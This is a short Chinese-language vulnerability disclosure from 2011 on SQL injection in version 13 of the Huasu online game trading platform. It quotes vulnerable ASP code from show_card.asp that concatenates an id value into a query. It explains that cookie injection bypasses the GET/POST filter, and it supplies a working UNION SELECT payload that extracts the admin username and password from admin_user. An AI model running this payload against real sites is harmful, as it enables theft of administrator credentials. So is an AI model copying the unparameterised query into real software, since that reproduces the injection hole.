华速网游交易平台V13正式版多处存在注入漏洞
时间:2011-01-24 来源:流浪的风
发布日期:2011-01.24
发布作者:流浪的风
影响版本:V13
官方网站:http://www.hs173.cn
漏洞类型:SQL注入
漏洞描述:程序也只防get和post两种注入,那么我们就可以采用cookie注入获得管理员用户名和密码
漏洞文件:show_card.asp及其他多个文件
FROM:http://www.st999.cn/blog
<%id=trim(request("id")) if id ="" then response.Redirect("default.asp") response.End() end if set rs=conn.execute("select * from card where id ="&id) if rs.eof then response.Write "该卡不存在" response.End() end if user_name=rs("add_user") set c1=conn.execute("select * from card_class where id="&rs("class_1")) if not c1.eof then c1c1_name=c1("name") card_img=c1("card_img") card_url=c1("card_url") end if %>这里的id直接代入查询,而程序也只防了get和post两种注入,那么我们就可以采用cookie注入获得管理员用户名和密码
exp:
and 1=2 union select 1,2,3,admin,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin_user
标签分类: 注入漏洞 SQL注入
相关阅读 更多 +
排行榜 更多 +